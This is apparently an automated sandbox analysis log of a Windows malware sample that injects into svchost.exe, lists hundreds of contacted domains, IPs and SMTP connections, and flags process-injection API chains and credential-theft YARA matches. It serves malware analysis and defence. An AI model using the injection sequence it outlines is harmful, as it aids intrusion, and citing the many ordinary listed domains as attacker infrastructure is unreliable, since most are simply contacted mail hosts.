                Source: C:\Windows\SysWOW64\svchost.exeDomain query: riwn.org
                Source: C:\Windows\SysWOW64\svchost.exeDomain query: geecl.com
                Source: C:\Windows\SysWOW64\svchost.exeNetwork Connect: 94.130.146.206 443Jump to behavior
                Source: C:\Windows\SysWOW64\svchost.exeDomain query: juso-gr.ch
                Source: C:\Windows\SysWOW64\svchost.exeDomain query: hotmial.com
                Source: C:\Windows\SysWOW64\svchost.exeDomain query: mx1.pythian.com
                Source: C:\Windows\SysWOW64\svchost.exeDomain query: sutcast.ca
                Source: C:\Windows\SysWOW64\svchost.exeDomain query: ns.w2hdns2.com
                Source: C:\Windows\SysWOW64\svchost.exeDomain query: bettzedek-org.inbound.emailservice.co
                Source: C:\Windows\SysWOW64\svchost.exeDomain query: bvision.com
                Source: C:\Windows\SysWOW64\svchost.exeDomain query: ns1.pontualti.com.br
                Source: C:\Windows\SysWOW64\svchost.exeDomain query: spray.se
                Source: C:\Windows\SysWOW64\svchost.exeDomain query: livejournali.com
                Source: C:\Windows\SysWOW64\svchost.exeNetwork Connect: 23.227.38.32 80
                Source: C:\Windows\SysWOW64\svchost.exeDomain query: zzconsult.com
                Source: C:\Windows\SysWOW64\svchost.exeDomain query: people.net
                Source: C:\Windows\SysWOW64\svchost.exeDomain query: rjii.net.1.0001.arsmtp.com
                Source: C:\Windows\SysWOW64\svchost.exeDomain query: optimagroupinc.com.2.0001.arsmtp.com
                Source: C:\Windows\SysWOW64\svchost.exeNetwork Connect: 51.89.6.56 80
                Source: C:\Windows\SysWOW64\svchost.exeNetwork Connect: 172.67.160.168 80Jump to behavior
                Source: C:\Windows\SysWOW64\svchost.exeDomain query: ns01.memail-dns.com
                Source: C:\Windows\SysWOW64\svchost.exeDomain query: inosat.com
                Source: C:\Windows\SysWOW64\svchost.exeNetwork Connect: 183.181.82.14 80
                Source: C:\Windows\SysWOW64\svchost.exeDomain query: t-trust.jp
                Source: C:\Windows\SysWOW64\svchost.exeDomain query: whitemc.it
                Source: C:\Windows\SysWOW64\svchost.exeNetwork Connect: 172.67.72.150 80Jump to behavior
                Source: C:\Windows\SysWOW64\svchost.exeDomain query: sequere.com
                Source: C:\Windows\SysWOW64\svchost.exeDomain query: ns-1680.awsdns-18.co.uk
                Source: C:\Windows\SysWOW64\svchost.exeDomain query: event.com
                Source: C:\Windows\SysWOW64\svchost.exeDomain query: mx.voiaj.md
                Source: C:\Windows\SysWOW64\svchost.exeDomain query: forbin.net
                Source: C:\Windows\SysWOW64\svchost.exeDomain query: gocsc.com
                Source: C:\Windows\SysWOW64\svchost.exeDomain query: juliemusic.com
                Source: C:\Windows\SysWOW64\svchost.exeNetwork Connect: 157.7.231.224 25
                Source: C:\Windows\SysWOW64\svchost.exeDomain query: dergavoldop.info
                Source: C:\Windows\SysWOW64\svchost.exeDomain query: smtp.live.com
                Source: C:\Windows\SysWOW64\svchost.exeDomain query: mailstream-west.mxrecord.io
                Source: C:\Windows\SysWOW64\svchost.exeDomain query: mail.dbins.net
                Source: C:\Windows\SysWOW64\svchost.exeDomain query: onelinkpr.net
                Source: C:\Windows\SysWOW64\svchost.exeDomain query: mailex.2980.com
                Source: C:\Windows\SysWOW64\svchost.exeDomain query: tovarish.com
                Source: C:\Windows\SysWOW64\svchost.exeNetwork Connect: 35.169.15.168 80
                Source: C:\Windows\SysWOW64\svchost.exeDomain query: selectivemetals.com
                Source: C:\Windows\SysWOW64\svchost.exeNetwork Connect: 151.101.2.132 80
                Source: C:\Windows\SysWOW64\svchost.exeDomain query: idealtile.com.2.0001.arsmtp.com
                Source: C:\Windows\SysWOW64\svchost.exeDomain query: cartadelapau.org
                Source: C:\Windows\SysWOW64\svchost.exeDomain query: veeam.com
                Source: C:\Windows\SysWOW64\svchost.exeDomain query: pfizer.com
                Source: C:\Windows\SysWOW64\svchost.exeDomain query: linder.fr
                Source: C:\Windows\SysWOW64\svchost.exeNetwork Connect: 67.21.93.229 80Jump to behavior
                Source: C:\Windows\SysWOW64\svchost.exeNetwork Connect: 203.137.75.45 80Jump to behavior
                Source: C:\Windows\SysWOW64\svchost.exeDomain query: mariareinamarianistas.net
                Source: C:\Windows\SysWOW64\svchost.exeDomain query: zippymail.info
                Source: C:\Windows\SysWOW64\svchost.exeDomain query: mx-in01.eu.retarus.com
                Source: C:\Windows\SysWOW64\svchost.exeDomain query: mx4.svitonline.com
                Source: C:\Windows\SysWOW64\svchost.exeDomain query: cluster-h.mailcontrol.com
                Source: C:\Windows\SysWOW64\svchost.exeNetwork Connect: 217.160.0.131 80Jump to behavior
                Source: C:\Windows\SysWOW64\svchost.exeDomain query: medianis.net
                Source: C:\Windows\SysWOW64\svchost.exeDomain query: nomatech.net
                Source: C:\Windows\SysWOW64\svchost.exeDomain query: cpacanada.ca
                Source: C:\Windows\SysWOW64\svchost.exeDomain query: peoplescom.net
                Source: C:\Windows\SysWOW64\svchost.exeNetwork Connect: 83.223.113.46 80Jump to behavior
                Source: C:\Windows\SysWOW64\svchost.exeDomain query: ns1.telekom.net
                Source: C:\Windows\SysWOW64\svchost.exeNetwork Connect: 69.195.90.46 80
                Source: C:\Windows\SysWOW64\svchost.exeDomain query: conceriacaponigiuseppe.it
                Source: C:\Windows\SysWOW64\svchost.exeDomain query: deepakfasteners.com
                Source: C:\Windows\SysWOW64\svchost.exeDomain query: dfoofmail.net
                Source: C:\Windows\SysWOW64\svchost.exeDomain query: mail.yaxmail.net
                Source: C:\Windows\SysWOW64\svchost.exeDomain query: bisok.com
                Source: C:\Windows\SysWOW64\svchost.exeNetwork Connect: 85.128.196.22 80Jump to behavior
                Source: C:\Windows\SysWOW64\svchost.exeDomain query: mxa-003d6e01.gslb.pphosted.com
                Source: C:\Windows\SysWOW64\svchost.exeDomain query: s5w.com
                Source: C:\Windows\SysWOW64\svchost.exeDomain query: paraski.org
                Source: C:\Windows\SysWOW64\svchost.exeDomain query: logicsupport.com
                Source: C:\Windows\SysWOW64\svchost.exeDomain query: gftg.com
                Source: C:\Windows\SysWOW64\svchost.exeDomain query: nbhn.org
                Source: C:\Windows\SysWOW64\svchost.exeNetwork Connect: 74.208.215.145 80Jump to behavior
                Source: C:\Windows\SysWOW64\svchost.exeDomain query: any-s.net
                Source: C:\Windows\SysWOW64\svchost.exeDomain query: svitonline.com
                Source: C:\Windows\SysWOW64\svchost.exeDomain query: piacton.com
                Source: C:\Windows\SysWOW64\svchost.exeNetwork Connect: 145.239.5.159 80Jump to behavior
                Source: C:\Windows\SysWOW64\svchost.exeDomain query: harrahs.com
                Source: C:\Windows\SysWOW64\svchost.exeDomain query: mail.sequere.com
                Source: C:\Windows\SysWOW64\svchost.exeNetwork Connect: 34.174.61.199 25Jump to behavior
                Source: C:\Windows\SysWOW64\svchost.exeNetwork Connect: 77.78.104.3 80Jump to behavior
                Source: C:\Windows\SysWOW64\svchost.exeDomain query: molodin.org
                Source: C:\Windows\SysWOW64\svchost.exeDomain query: sabca.be
                Source: C:\Windows\SysWOW64\svchost.exeDomain query: ardaco.com
                Source: C:\Windows\SysWOW64\svchost.exeDomain query: srv4.rejecthost.com
                Source: C:\Windows\SysWOW64\svchost.exeDomain query: gtdel.net
                Source: C:\Windows\SysWOW64\svchost.exeDomain query: globcom.net
                Source: C:\Windows\SysWOW64\svchost.exeDomain query: tvcskyshop.com
                Source: C:\Windows\SysWOW64\svchost.exeDomain query: asorent.com
                Source: C:\Windows\SysWOW64\svchost.exeDomain query: bienydebuenas.com
                Source: C:\Windows\SysWOW64\svchost.exeDomain query: pythian.com
                Source: C:\Windows\SysWOW64\svchost.exeDomain query: ymlp15.net
                Source: C:\Windows\SysWOW64\svchost.exeNetwork Connect: 212.44.102.75 25
                Source: C:\Windows\SysWOW64\svchost.exeDomain query: mbn.nifty.com
                Source: C:\Windows\SysWOW64\svchost.exeDomain query: hlag.com
                Source: C:\Windows\SysWOW64\svchost.exeDomain query: krim.ws
                Source: C:\Windows\SysWOW64\svchost.exeDomain query: plantasmediterraneas.com
                Source: C:\Windows\SysWOW64\svchost.exeDomain query: biosolve.com
                Source: C:\Windows\SysWOW64\svchost.exeNetwork Connect: 76.223.54.146 80Jump to behavior
                Source: C:\Windows\SysWOW64\svchost.exeNetwork Connect: 203.0.113.0 80Jump to behavior
                Source: C:\Windows\SysWOW64\svchost.exeDomain query: denbiggelaar.com
                Source: C:\Windows\SysWOW64\svchost.exeDomain query: whistlerlibrary.ca
                Source: C:\Windows\SysWOW64\svchost.exeNetwork Connect: 208.100.26.245 25Jump to behavior
                Source: C:\Windows\SysWOW64\svchost.exeDomain query: nekono.net
                Source: C:\Windows\SysWOW64\svchost.exeDomain query: cvswl.org
                Source: C:\Windows\SysWOW64\svchost.exeDomain query: weber-metaux.com
                Source: C:\Windows\SysWOW64\svchost.exeDomain query: allstate.ca
                Source: C:\Windows\SysWOW64\svchost.exeDomain query: mx.breakthur.com
                Source: C:\Windows\SysWOW64\svchost.exeDomain query: sninternet.com
                Source: C:\Windows\SysWOW64\svchost.exeDomain query: cubodown.com
                Source: C:\Windows\SysWOW64\svchost.exeDomain query: infotech.pl
                Source: C:\Windows\SysWOW64\svchost.exeDomain query: c1oramn.com
                Source: C:\Windows\SysWOW64\svchost.exeNetwork Connect: 61.200.81.21 25Jump to behavior
                Source: C:\Windows\SysWOW64\svchost.exeNetwork Connect: 172.67.164.178 443Jump to behavior
                Source: C:\Windows\SysWOW64\svchost.exeDomain query: www.muhr-soehne.de
                Source: C:\Windows\SysWOW64\svchost.exeDomain query: fortknox.bm
                Source: C:\Windows\SysWOW64\svchost.exeDomain query: my.com
                Source: C:\Windows\SysWOW64\svchost.exeDomain query: camamat.com
                Source: C:\Windows\SysWOW64\svchost.exeDomain query: alexpope.biz
                Source: C:\Windows\SysWOW64\svchost.exeDomain query: fundeo.com
                Source: C:\Windows\SysWOW64\svchost.exeDomain query: pec.vittoriaassicurazioni.it
                Source: C:\Windows\SysWOW64\svchost.exeDomain query: sunshineblp.com
                Source: C:\Windows\SysWOW64\svchost.exeDomain query: wallstreetinstitute.cz
                Source: C:\Windows\SysWOW64\svchost.exeNetwork Connect: 103.168.172.218 25
                Source: C:\Windows\SysWOW64\svchost.exeDomain query: mclink.it
                Source: C:\Windows\SysWOW64\svchost.exeDomain query: lieblingslied-records.de
                Source: C:\Windows\SysWOW64\svchost.exeDomain query: mx1.active24.com
                Source: C:\Windows\SysWOW64\svchost.exeDomain query: sanfotek.net
                Source: C:\Windows\SysWOW64\svchost.exeDomain query: mouseclicker.com
                Source: C:\Windows\SysWOW64\svchost.exeDomain query: 4uservizi.net
                Source: C:\Windows\SysWOW64\svchost.exeDomain query: visu.com
                Source: C:\Windows\SysWOW64\svchost.exeDomain query: fr-dat.com
                Source: C:\Windows\SysWOW64\svchost.exeDomain query: vitor.tk
                Source: C:\Windows\SysWOW64\svchost.exeNetwork Connect: 195.128.140.29 80
                Source: C:\Windows\SysWOW64\svchost.exeNetwork Connect: 159.89.244.183 25
                Source: C:\Windows\SysWOW64\svchost.exeNetwork Connect: 38.111.255.201 80Jump to behavior
                Source: C:\Windows\SysWOW64\svchost.exeDomain query: oozkranj.com
                Source: C:\Windows\SysWOW64\svchost.exeNetwork Connect: 99.83.190.102 80
                Source: C:\Windows\SysWOW64\svchost.exeDomain query: prtc.net
                Source: C:\Windows\SysWOW64\svchost.exeDomain query: thehealthline-ca.mail.protection.outlook.com
                Source: C:\Windows\SysWOW64\svchost.exeDomain query: nsa.pegasodns.net
                Source: C:\Windows\SysWOW64\svchost.exeDomain query: mail.telecompost.it
                Source: C:\Windows\SysWOW64\svchost.exeDomain query: w01a08c1.kasserver.com
                Source: C:\Windows\SysWOW64\svchost.exeNetwork Connect: 47.91.167.60 80
                Source: C:\Windows\SysWOW64\svchost.exeDomain query: linochaves.com
                Source: C:\Windows\SysWOW64\svchost.exeDomain query: eilhk.com
                Source: C:\Windows\SysWOW64\svchost.exeDomain query: tanya.net
                Source: C:\Windows\SysWOW64\svchost.exeNetwork Connect: 219.94.128.87 80
                Source: C:\Windows\SysWOW64\svchost.exeNetwork Connect: 104.21.234.121 80
                Source: C:\Windows\SysWOW64\svchost.exeNetwork Connect: 104.21.234.120 25Jump to behavior
                Source: C:\Windows\SysWOW64\svchost.exeNetwork Connect: 104.21.8.75 80Jump to behavior
                Source: C:\Windows\SysWOW64\svchost.exeNetwork Connect: 93.187.206.66 25
                Source: C:\Windows\SysWOW64\svchost.exeNetwork Connect: 82.208.6.9 80Jump to behavior
                Source: C:\Windows\SysWOW64\svchost.exeDomain query: ns1.locaweb.com.br
                Source: C:\Windows\SysWOW64\svchost.exeDomain query: mail.resumesrv.com
                Source: C:\Windows\SysWOW64\svchost.exeDomain query: crosstech.com.au
                Source: C:\Windows\SysWOW64\svchost.exeDomain query: ns2.myvdc.it
                Source: C:\Windows\SysWOW64\svchost.exeDomain query: pettigna.com
                Source: C:\Windows\SysWOW64\svchost.exeDomain query: 6clo.com
                Source: C:\Windows\SysWOW64\svchost.exeNetwork Connect: 35.214.171.193 80Jump to behavior
                Source: C:\Windows\SysWOW64\svchost.exeDomain query: compzon.com
                Source: C:\Windows\SysWOW64\svchost.exeDomain query: emael.com
                Source: C:\Windows\SysWOW64\svchost.exeDomain query: 24.com.es
                Source: C:\Windows\SysWOW64\svchost.exeDomain query: pylypiuk.qmal.com
                Source: C:\Windows\SysWOW64\svchost.exeDomain query: foodallergy.com
                Source: C:\Windows\SysWOW64\svchost.exeDomain query: lbindustries.org
                Source: C:\Windows\SysWOW64\svchost.exeDomain query: mx01.t-com.hr
                Source: C:\Windows\SysWOW64\svchost.exeNetwork Connect: 34.224.10.110 80
                Source: C:\Windows\SysWOW64\svchost.exeDomain query: ns1.terrakom.hr
                Source: C:\Windows\SysWOW64\svchost.exeDomain query: cci-dialog.de
                Source: C:\Windows\SysWOW64\svchost.exeDomain query: awal.ws
                Source: C:\Windows\SysWOW64\svchost.exeDomain query: mxa-00160c04.gslb.pphosted.com
                Source: C:\Windows\SysWOW64\svchost.exeDomain query: c-drop.net
                Source: C:\Windows\SysWOW64\svchost.exeDomain query: modeinfo.com
                Source: C:\Windows\SysWOW64\svchost.exeDomain query: ns1.hostpro.ua
                Source: C:\Windows\SysWOW64\svchost.exeDomain query: emial.com
                Source: C:\Windows\SysWOW64\svchost.exeDomain query: sochi.com
                Source: C:\Windows\SysWOW64\svchost.exeDomain query: binarysecuritysolutions.com
                Source: C:\Windows\SysWOW64\svchost.exeDomain query: mailgw6.gtinvest.com
                Source: C:\Windows\SysWOW64\svchost.exeDomain query: markerman.com
                Source: C:\Windows\SysWOW64\svchost.exeDomain query: leva.com
                Source: C:\Windows\SysWOW64\svchost.exeDomain query: cho.net
                Source: C:\Windows\SysWOW64\svchost.exeDomain query: evertek.net
                Source: C:\Windows\SysWOW64\svchost.exeDomain query: ns1.yandex.ru
                Source: C:\Windows\SysWOW64\svchost.exeDomain query: ftcispnet-mx.email-protect.gosecure.net
                Source: C:\Windows\SysWOW64\svchost.exeDomain query: sjm.com
                Source: C:\Windows\SysWOW64\svchost.exeDomain query: hertspartsft.nhs.uk
                Source: C:\Windows\SysWOW64\svchost.exeDomain query: snf.it
                Source: C:\Windows\SysWOW64\svchost.exeDomain query: miles.com
                Source: C:\Windows\SysWOW64\svchost.exeDomain query: soluzioni-sw.it
                Source: C:\Windows\SysWOW64\svchost.exeNetwork Connect: 172.67.209.11 80Jump to behavior
                Source: C:\Windows\SysWOW64\svchost.exeDomain query: rkengg.com
                Source: C:\Windows\SysWOW64\svchost.exeDomain query: madjek.com
                Source: C:\Windows\SysWOW64\svchost.exeNetwork Connect: 34.94.245.237 25
                Source: C:\Windows\SysWOW64\svchost.exeDomain query: turner.com
                Source: C:\Windows\SysWOW64\svchost.exeDomain query: gyn.com
                Source: C:\Windows\SysWOW64\svchost.exeDomain query: revoldia.net
                Source: C:\Windows\SysWOW64\svchost.exeDomain query: meta-lab.com
                Source: C:\Windows\SysWOW64\svchost.exeDomain query: certifiedtileandmarble.com
                Source: C:\Windows\SysWOW64\svchost.exeDomain query: segnidivik.it
                Source: C:\Windows\SysWOW64\svchost.exeDomain query: s-sm.org
                Source: C:\Windows\SysWOW64\svchost.exeDomain query: centrum-cz-10mx1.eco-mx.cz
                Source: C:\Windows\SysWOW64\svchost.exeNetwork Connect: 54.212.145.129 80Jump to behavior
                Source: C:\Windows\SysWOW64\svchost.exeNetwork Connect: 86.105.245.69 80
                Source: C:\Windows\SysWOW64\svchost.exeDomain query: rcm.at
                Source: C:\Windows\SysWOW64\svchost.exeDomain query: net-up.com
                Source: C:\Windows\SysWOW64\svchost.exeDomain query: moakt.com
                Source: C:\Windows\SysWOW64\svchost.exeDomain query: mail.trinom.com
                Source: C:\Windows\SysWOW64\svchost.exeDomain query: tivejo.com
                Source: C:\Windows\SysWOW64\svchost.exeDomain query: alltell.net
                Source: C:\Windows\SysWOW64\svchost.exeDomain query: culver.com.au
                Source: C:\Windows\SysWOW64\svchost.exeDomain query: mail.protonmail.ch
                Source: C:\Windows\SysWOW64\svchost.exeDomain query: mailgw02.host.it
                Source: C:\Windows\SysWOW64\svchost.exeDomain query: pelicanhill.com
                Source: C:\Windows\SysWOW64\svchost.exeNetwork Connect: 185.22.232.175 80Jump to behavior
                Source: C:\Windows\SysWOW64\svchost.exeDomain query: plenimagem.com
                Source: C:\Windows\SysWOW64\svchost.exeDomain query: ellusions.com
                Source: C:\Windows\SysWOW64\svchost.exeDomain query: web.com
                Source: C:\Windows\SysWOW64\svchost.exeNetwork Connect: 59.106.13.169 25
                Source: C:\Windows\SysWOW64\svchost.exeDomain query: e-asset.net
                Source: C:\Windows\SysWOW64\svchost.exeDomain query: mxa-00181c02.gslb.pphosted.com
                Source: C:\Windows\SysWOW64\svchost.exeDomain query: smtp.vektor.net
                Source: C:\Windows\SysWOW64\svchost.exeNetwork Connect: 193.70.68.254 80
                Source: C:\Windows\SysWOW64\svchost.exeDomain query: ocel.cz
                Source: C:\Windows\SysWOW64\svchost.exeDomain query: ns-ut7.proofpoint.com
                Source: C:\Windows\SysWOW64\svchost.exeDomain query: nettlinx.org
                Source: C:\Windows\SysWOW64\svchost.exeDomain query: us.es
                Source: C:\Windows\SysWOW64\svchost.exeDomain query: mx01.nicmail.ru
                Source: C:\Windows\SysWOW64\svchost.exeDomain query: expotaranto.com
                Source: C:\Windows\SysWOW64\svchost.exeDomain query: softizer.com
                Source: C:\Windows\SysWOW64\svchost.exeDomain query: srsparivar.com
                Source: C:\Windows\SysWOW64\svchost.exeDomain query: rokoron.com
                Source: C:\Windows\SysWOW64\svchost.exeDomain query: k-nikko.com
                Source: C:\Windows\SysWOW64\svchost.exeDomain query: www.jroy.net
                Source: C:\Windows\SysWOW64\svchost.exeDomain query: ns37.domaincontrol.com
                Source: C:\Windows\SysWOW64\svchost.exeDomain query: mail.eilhk.com
                Source: C:\Windows\SysWOW64\svchost.exeDomain query: doggybag.org
                Source: C:\Windows\SysWOW64\svchost.exeDomain query: mx3.ovh.net
                Source: C:\Windows\SysWOW64\svchost.exeDomain query: harlandale.net
                Source: C:\Windows\SysWOW64\svchost.exeNetwork Connect: 148.72.176.26 80Jump to behavior
                Source: C:\Windows\SysWOW64\svchost.exeDomain query: dwid.de
                Source: C:\Windows\SysWOW64\svchost.exeNetwork Connect: 59.106.13.181 80Jump to behavior
                Source: C:\Windows\SysWOW64\svchost.exeDomain query: hsmx149.cn4e.com
                Source: C:\Windows\SysWOW64\svchost.exeNetwork Connect: 93.188.2.51 25Jump to behavior
                Source: C:\Windows\SysWOW64\svchost.exeDomain query: mx100.nn.hr
                Source: C:\Windows\SysWOW64\svchost.exeNetwork Connect: 164.92.82.47 80
                Source: C:\Windows\SysWOW64\svchost.exeDomain query: feital.net
                Source: C:\Windows\SysWOW64\svchost.exeDomain query: fsrinc.com
                Source: C:\Windows\SysWOW64\svchost.exeDomain query: nomatech-net.mail.protection.outlook.com
                Source: C:\Windows\SysWOW64\svchost.exeDomain query: bc.dmgarch.com
                Source: C:\Windows\SysWOW64\svchost.exeDomain query: uk.mx1.mailanyone.net
                Source: C:\Windows\SysWOW64\svchost.exeNetwork Connect: 104.21.66.220 443Jump to behavior
                Source: C:\Windows\SysWOW64\svchost.exeDomain query: terradoliva.com
                Source: C:\Windows\SysWOW64\svchost.exeDomain query: ns1.epbinternet.net
                Source: C:\Windows\SysWOW64\svchost.exeDomain query: mail.lb.auchan.pt
                Source: C:\Windows\SysWOW64\svchost.exeDomain query: easybuygos.com
                Source: C:\Windows\SysWOW64\svchost.exeDomain query: ns-769.awsdns-32.net
                Source: C:\Windows\SysWOW64\svchost.exeDomain query: mspool.cdt.cz
                Source: C:\Windows\SysWOW64\svchost.exeDomain query: alt4.gmail-smtp-in.l.google.com
                Source: C:\Windows\SysWOW64\svchost.exeDomain query: leapc.com
                Source: C:\Windows\SysWOW64\svchost.exeDomain query: pacificcoast.net
                Source: C:\Windows\SysWOW64\svchost.exeDomain query: hotmmai.com
                Source: C:\Windows\SysWOW64\svchost.exeDomain query: spetema.com
                Source: C:\Windows\SysWOW64\svchost.exeDomain query: nsbuechner.de
                Source: C:\Users\user\Desktop\EwK95WVtzI.exeMemory allocated: C:\Windows\SysWOW64\svchost.exe base: 7F8D0000 protect: page execute and read and writeJump to behavior
                Source: C:\Users\user\pigalicapi.exeMemory allocated: C:\Windows\SysWOW64\svchost.exe base: 400000 protect: page execute and read and writeJump to behavior
                Source: C:\Users\user\Desktop\EwK95WVtzI.exeMemory written: C:\Windows\SysWOW64\svchost.exe base: 7F8D0000 value starts with: 4D5AJump to behavior
                Source: C:\Users\user\Desktop\EwK95WVtzI.exeMemory written: C:\Windows\SysWOW64\svchost.exe base: 7FCE0000 value starts with: 4D5AJump to behavior
                Source: C:\Users\user\pigalicapi.exeMemory written: C:\Windows\SysWOW64\svchost.exe base: 400000 value starts with: 4D5AJump to behavior
                Source: C:\Users\user\pigalicapi.exeMemory written: C:\Windows\SysWOW64\svchost.exe base: 400000 value starts with: 4D5AJump to behavior
                Source: C:\Windows\SysWOW64\svchost.exeMemory written: C:\Windows\SysWOW64\svchost.exe base: 7EB00000 value starts with: 4D5AJump to behavior
                Source: C:\Windows\SysWOW64\svchost.exeMemory written: C:\Windows\SysWOW64\svchost.exe base: 4000000 value starts with: 4D5AJump to behavior
                Source: C:\Windows\SysWOW64\svchost.exeMemory written: C:\Windows\SysWOW64\svchost.exe base: 13140000 value starts with: 4D5AJump to behavior
                Source: C:\Windows\SysWOW64\svchost.exeMemory written: C:\Windows\SysWOW64\svchost.exe base: 4000000 value starts with: 4D5AJump to behavior
                Source: C:\Windows\SysWOW64\svchost.exeMemory written: C:\Windows\SysWOW64\svchost.exe base: 13140000 value starts with: 4D5AJump to behavior
                Source: C:\Windows\SysWOW64\svchost.exeMemory written: C:\Windows\SysWOW64\svchost.exe base: 4000000 value starts with: 4D5AJump to behavior
                Source: C:\Windows\SysWOW64\svchost.exeMemory written: C:\Windows\SysWOW64\svchost.exe base: 13140000 value starts with: 4D5AJump to behavior
                Source: C:\Windows\SysWOW64\svchost.exeMemory written: C:\Windows\SysWOW64\svchost.exe base: 4000000 value starts with: 4D5AJump to behavior
                Source: C:\Users\user\Desktop\EwK95WVtzI.exeCode function: 0_2_013F20B0 GetEnvironmentVariableA,lstrcatA,lstrcatA,lstrcatA,VirtualAlloc,CreateProcessA,VirtualFree,VirtualAllocEx,VirtualAllocEx,TerminateProcess,CloseHandle,CloseHandle,VirtualFree,WriteProcessMemory,TerminateProcess,CloseHandle,CloseHandle,VirtualFree,VirtualFree,Wow64GetThreadContext,TerminateProcess,CloseHandle,CloseHandle,WriteProcessMemory,TerminateProcess,CloseHandle,CloseHandle,Wow64SetThreadContext,ResumeThread,TerminateProcess,CloseHandle,CloseHandle,0_2_013F20B0
                Source: C:\Users\user\Desktop\EwK95WVtzI.exeMemory written: C:\Windows\SysWOW64\svchost.exe base: 7F8D0000Jump to behavior
                Source: C:\Users\user\Desktop\EwK95WVtzI.exeMemory written: C:\Windows\SysWOW64\svchost.exe base: 3EC008Jump to behavior
                Source: C:\Users\user\Desktop\EwK95WVtzI.exeMemory written: C:\Windows\SysWOW64\svchost.exe base: 7FCE0000Jump to behavior
                Source: C:\Users\user\Desktop\EwK95WVtzI.exeMemory written: C:\Windows\SysWOW64\svchost.exe base: 570008Jump to behavior
                Source: C:\Users\user\pigalicapi.exeMemory written: C:\Windows\SysWOW64\svchost.exe base: 400000Jump to behavior
                Source: C:\Users\user\pigalicapi.exeMemory written: C:\Windows\SysWOW64\svchost.exe base: 2E7F008Jump to behavior
                Source: C:\Users\user\pigalicapi.exeMemory written: C:\Windows\SysWOW64\svchost.exe base: 400000Jump to behavior
                Source: C:\Users\user\pigalicapi.exeMemory written: C:\Windows\SysWOW64\svchost.exe base: 2E6D008Jump to behavior
                Source: C:\Users\user\Desktop\EwK95WVtzI.exeCode function: 0_2_013F2510 VirtualAlloc,VirtualAllocEx,VirtualAllocEx,VirtualFree,WriteProcessMemory,VirtualFree,VirtualFree,CreateRemoteThread,0_2_013F2510
                Source: C:\Users\user\pigalicapi.exeCode function: 4_2_00A12510 VirtualAlloc,VirtualAllocEx,VirtualAllocEx,VirtualFree,WriteProcessMemory,VirtualFree,VirtualFree,CreateRemoteThread,4_2_00A12510
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 6_2_04001DC0 VirtualAlloc,VirtualAllocEx,VirtualAllocEx,VirtualFree,WriteProcessMemory,VirtualFree,VirtualFree,CreateRemoteThread,6_2_04001DC0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 8_2_131451E8 GetTickCount,GetCommandLineA,StrStrA,CreateProcessA,VirtualAllocEx,TerminateProcess,WriteProcessMemory,GetTickCount,WriteProcessMemory,GetTickCount,GetTickCount,WriteProcessMemory,CreateRemoteThread,GetLastError,CloseHandle,8_2_131451E8
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 11_2_131451F8 GetTickCount,GetCommandLineA,StrStrA,CreateProcessA,VirtualAllocEx,TerminateProcess,WriteProcessMemory,GetTickCount,WriteProcessMemory,GetTickCount,GetTickCount,WriteProcessMemory,CreateRemoteThread,GetLastError,CloseHandle,11_2_131451F8
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 12_2_131451F8 GetTickCount,GetCommandLineA,StrStrA,CreateProcessA,VirtualAllocEx,TerminateProcess,WriteProcessMemory,GetTickCount,WriteProcessMemory,GetTickCount,GetTickCount,WriteProcessMemory,CreateRemoteThread,GetLastError,CloseHandle,12_2_131451F8
                Source: C:\Users\user\Desktop\EwK95WVtzI.exeProcess created: C:\Windows\SysWOW64\svchost.exe C:\Windows\system32\svchost.exeJump to behavior
                Source: C:\Users\user\Desktop\EwK95WVtzI.exeProcess created: C:\Windows\SysWOW64\svchost.exe C:\Windows\system32\svchost.exeJump to behavior
                Source: C:\Users\user\pigalicapi.exeProcess created: C:\Windows\SysWOW64\svchost.exe C:\Windows\system32\svchost.exeJump to behavior
                Source: C:\Users\user\pigalicapi.exeProcess created: C:\Windows\SysWOW64\svchost.exe C:\Windows\system32\svchost.exeJump to behavior
                Source: C:\Windows\SysWOW64\svchost.exeProcess created: C:\Windows\SysWOW64\svchost.exe C:\Windows\system32\svchost.exeJump to behavior
                Source: C:\Windows\SysWOW64\svchost.exeProcess created: C:\Windows\SysWOW64\svchost.exe C:\Windows\system32\svchost.exeJump to behavior
                Source: C:\Windows\SysWOW64\svchost.exeProcess created: C:\Windows\SysWOW64\svchost.exe C:\Windows\system32\svchost.exeJump to behavior
                Source: C:\Windows\SysWOW64\svchost.exeProcess created: C:\Windows\SysWOW64\svchost.exe C:\Windows\system32\svchost.exeJump to behavior
                Source: C:\Windows\SysWOW64\svchost.exeCode function: GetLocaleInfoA,8_2_131565DC
                Source: C:\Windows\SysWOW64\svchost.exeCode function: GetLocaleInfoA,11_2_131565EC
                Source: C:\Windows\SysWOW64\svchost.exeCode function: GetLocaleInfoA,12_2_131565EC
                Source: C:\Users\user\Desktop\EwK95WVtzI.exeQueries volume information: C:\ VolumeInformationJump to behavior
                Source: C:\Users\user\pigalicapi.exeQueries volume information: C:\ VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\EwK95WVtzI.exeCode function: 0_2_0050A194 cpuid 0_2_0050A194
                Source: C:\Users\user\Desktop\EwK95WVtzI.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuidJump to behavior
                Source: C:\Users\user\Desktop\EwK95WVtzI.exeCode function: 0_2_0050AA6C GetSystemTimeAsFileTime,GetCurrentThreadId,GetCurrentProcessId,QueryPerformanceCounter,0_2_0050AA6C
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 8_2_13147359 GetTimeZoneInformation,GetTickCount,SystemTimeToFileTime,wsprintfA,8_2_13147359
                Source: C:\Users\user\Desktop\EwK95WVtzI.exeCode function: 0_2_00503C6D CreateNamedPipeA,0_2_00503C6D
                Source: C:\Users\user\Desktop\EwK95WVtzI.exeCode function: 0_2_013F8F80 GetVersionExA,GetSystemInfo,lstrcatA,lstrcatA,lstrcatA,GetSystemMetrics,lstrcatA,GetSystemMetrics,lstrcatA,lstrcatA,lstrcatA,lstrcatA,lstrcatA,lstrcatA,lstrcatA,lstrcatA,lstrcatA,lstrlenA,lstrcatA,lstrcatA,lstrlenA,lstrcatA,0_2_013F8F80

                Stealing of Sensitive Information

                barindex
                Source: Yara matchFile source: 4.2.pigalicapi.exe.a10000.2.raw.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 0.2.EwK95WVtzI.exe.13f0000.1.raw.unpack, type: UNPACKEDPE
